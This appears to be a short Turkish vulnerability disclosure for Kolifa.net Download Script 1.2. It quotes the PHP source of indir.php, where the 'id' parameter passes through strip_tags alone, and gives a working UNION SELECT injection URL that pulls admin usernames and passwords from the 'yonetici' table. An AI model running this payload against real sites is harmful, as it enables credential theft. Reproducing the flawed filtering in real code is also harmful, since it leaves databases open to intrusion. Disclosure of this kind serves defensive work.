-
Kolifa.net Download Script 1.2 Sql Injection Vulnerability
Download scriptine ihtiyacım vardı ilk rastladığım script Kolifa.net Download Script 1.2 idi. Guvenliğini falan kontrol ettim indir.php dosyasında id parametresinden sql injection saldırısına maruz kaldığını gördüm.
Source :
<?php
//*****************************
//*****************************
//********** KOLİFA ***********
//********** DOWNLOAD *********
//********** SCRİPT ***********
//*****************************
//****** www.kolifa.net *******
//*****************************
ini_set('error_reporting', E_ALL^E_NOTICE);
include("ayarlar.php");
require('fonksiyon.php');
$baglanti = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die("Veritabanına bağlanılamadı.");
$sec = mysql_select_db($db);
$dwkodu=strip_tags($_GET['id']);
$act=strip_tags($_GET['act']);
?>
Gördüğünüz üzere 15. satırda script_tags fonksiyonu yalnız kullanılmış html kodların çalışmasını engellemek için fakat güvenlik için yetersiz. Sql injection attack ile database den veri çekilebiliyor. Dahil ettiğimiz sql sorgusundan sonra sayfada çıkan “Buraya Tıklayın” ın bağlantı adresinde çektiğiniz veri çıkacaktır.
Example Sql Inject Code :
indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*
Demo Site : Kolifa.net Download Script 1.2 Demo
Download : Kolifa.net Download Script 1.2 Download
